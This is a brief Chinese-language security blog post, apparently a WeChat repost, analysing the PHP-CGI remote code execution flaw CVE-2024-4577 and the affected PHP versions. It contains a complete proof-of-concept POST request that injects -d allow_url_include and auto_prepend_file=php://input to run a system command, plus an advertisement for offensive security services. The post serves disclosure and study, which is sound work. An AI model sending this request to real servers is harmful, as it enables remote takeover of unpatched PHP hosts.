最新PHP-RCE详细分析(CVE-2024-4577)
是一种对CVE-2012-1823的一种绕过
不是星标不推送文章了。
师傅也不想吧~
快把极梦C设置成星标吧。
php-cgi.exe接收的参数
-c 指定php.ini文件的位置
-n 不要加载php.ini文件
-d 指定配置项
-b 启动fastcgi进程
-s 显示文件源码
-T 执行指定次该文件
-h和-? 显示帮助
-s查看元件源码
-d allow_url_include=on
控制允许在include、include_once、require、require_once等函数中使用URL作为文件名,可以远程url加载执行php代码
-d auto_prepend_file=php://input
php://input流通常用于读取POST数据,而-d auto_prepend_file则指定了包含的php脚本为POST输入
POST /index.php?-d+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input HTTP/1.1
Host: xxxxx.com
Content-Length: 25
<?php system("whoami");?>
PHP 8.3 < 8.3.8
PHP 8.2 < 8.2.20
PHP 8.1 < 8.1.29
承接红蓝对抗,安全众测,安全培训,SRC培训,代码审计,渗透测试,应急响应,免杀等.
(安全可靠,排名稳定,战绩可查.)
原文始发于微信公众号(极梦C):实战-最新PHP-RCE+详细分析(CVE-2024-4577)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论